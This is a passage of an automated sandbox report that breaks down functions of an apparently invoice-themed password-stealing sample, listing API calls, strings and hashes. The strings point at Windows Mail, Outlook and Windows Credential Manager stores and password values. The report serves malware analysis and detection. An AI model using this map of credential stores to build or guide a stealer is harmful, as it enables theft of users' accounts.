                                        • API ID: AddressProc$Library$FreeLoad
                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                        • API String ID: 2449869053-232097475
                                        • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                        • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                        • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                        • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                        Function 00443AAB Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                        • strlen.MSVCRT ref: 00443AD2
                                        • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                        • memset.MSVCRT ref: 00443B2E
                                        • memset.MSVCRT ref: 00443B4B
                                        • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                        • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                        • LocalFree.KERNEL32(?), ref: 00443C23
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                          • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                        Strings
                                        • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                        • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                        • Salt, xrefs: 00443BA7
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                        • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                        • API String ID: 665470638-2687544566
                                        • Opcode ID: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                        • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                        • Opcode Fuzzy Hash: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                        • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                        Function 0040F802 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 118registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                        • memset.MSVCRT ref: 0040F84A
                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                        • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                        • LocalFree.KERNEL32(?), ref: 0040F92C
                                        • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                        • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                        • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                        • API String ID: 551151806-1288872324
                                        • Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                        • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                        • Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                        • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                        Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • sprintf.MSVCRT ref: 0040957B
                                        • LoadMenuA.USER32(?,?), ref: 00409589
                                          • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                          • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                          • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                          • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                        • DestroyMenu.USER32(00000000), ref: 004095A7
                                        • sprintf.MSVCRT ref: 004095EB
                                        • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                        • memset.MSVCRT ref: 0040961C
                                        • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                        • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                        • DestroyWindow.USER32(00000000), ref: 0040965C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                        • String ID: caption$dialog_%d$menu_%d
                                        • API String ID: 3259144588-3822380221
                                        • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                        • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                        • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                        • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                        Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                        • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                        • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                        • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                        • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                        • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$Library$FreeLoad
                                        • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                        • API String ID: 2449869053-4258758744
                                        • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                        • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                        • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                        • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                        Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wcsstr.MSVCRT ref: 0040426A
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                        • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                        • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                        • strchr.MSVCRT ref: 004042F6
                                        • strlen.MSVCRT ref: 0040430A
                                        • sprintf.MSVCRT ref: 0040432B
                                        • strchr.MSVCRT ref: 0040433C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                        • String ID: %s@gmail.com$www.google.com
                                        • API String ID: 3866421160-4070641962
                                        • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                        • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                        • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                        • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                        Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                        • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                          • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                          • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                          • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                        • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                        • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                        • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                        • memset.MSVCRT ref: 004097BD
                                        • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                          • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                        • String ID: TranslatorName$TranslatorURL$general$strings
                                        • API String ID: 1035899707-3647959541
                                        • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                        • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                        • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                        • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                        Function 00410D3D Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpy
                                        • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                        • API String ID: 714388716-318151290
                                        • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                        • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                        • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                        • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                        Function 0040CA30 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                        • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                        • SelectObject.GDI32(?,?), ref: 0040CACC
                                        • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                        • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                          • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                          • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                          • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                        • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                        • SetCursor.USER32(00000000), ref: 0040CB35
                                        • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                        • SetFocus.USER32(?), ref: 0040CB92
                                        • SetFocus.USER32(?), ref: 0040CC0B
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                        • String ID:
                                        • API String ID: 1416211542-0
                                        • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                        • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                        • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                        • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                        Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                        • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                        • API String ID: 2360744853-2229823034
                                        • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                        • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                        • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                        • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                        Function 00402C5D Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                        • memset.MSVCRT ref: 00402C9D
                                          • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                        • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                          • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                        • memset.MSVCRT ref: 00402CF7
                                        • sprintf.MSVCRT ref: 00402D10
                                        • sprintf.MSVCRT ref: 00402D4E
                                          • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                          • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Closememset$sprintf$EnumOpen
                                        • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                        • API String ID: 1831126014-3814494228
                                        • Opcode ID: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                        • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                        • Opcode Fuzzy Hash: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                        • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                        Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strchr.MSVCRT ref: 004100E4
                                        • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                          • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                        • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                        • _mbscat.MSVCRT ref: 0041014D
                                        • memset.MSVCRT ref: 00410129
                                          • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                          • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                        • memset.MSVCRT ref: 00410171
                                        • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                        • _mbscat.MSVCRT ref: 00410197
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                        • String ID: \systemroot
                                        • API String ID: 912701516-1821301763
                                        • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                        • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                        • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                        • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                        Function 004108E5 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                        • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                        • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                        • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                        • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                        Strings
                                        • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                        • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                        • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                        • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FromStringUuid$FreeTaskmemcpy
                                        • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                        • API String ID: 1640410171-2022683286
                                        • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                        • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                        • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                        • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                        Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                        • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                        • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$strlen
                                        • String ID: -journal$-wal$immutable$nolock
                                        • API String ID: 2619041689-3408036318
                                        • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                        • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                        • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                        • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                        Function 00409C1C Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 157COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A3E
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A4C
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A5D
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A74
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A7D
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00000000,75570A60,?,00000000), ref: 00409C53
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,00000000,75570A60,?,00000000), ref: 00409C6F
                                        • memcpy.MSVCRT(?,0wE,00000014,?,?,00000000,75570A60), ref: 00409C97
                                        • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014,?,?,00000000,75570A60), ref: 00409CB4
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,75570A60), ref: 00409D3D
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,?,?,?,?,00000000,75570A60), ref: 00409D47
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,75570A60), ref: 00409D7F
                                          • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                          • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75570A60), ref: 00408EBE
